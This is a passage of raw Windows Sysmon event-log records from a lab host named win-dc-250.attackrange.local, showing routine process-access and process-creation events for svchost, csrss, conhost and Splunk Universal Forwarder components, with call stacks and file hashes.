Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-432E-6000-E900-000000009A01}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-432E-6000-E900-000000009A01}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.905{08A6967A-432E-6000-E900-000000009A01}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.246{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-432E-6000-E800-000000009A01}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-432E-6000-E800-000000009A01}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-432E-6000-E800-000000009A01}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.231{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-432E-6000-E800-000000009A01}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.232{08A6967A-432E-6000-E800-000000009A01}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{08A6967A-4325-6000-B900-000000009A01}1176C:\Program 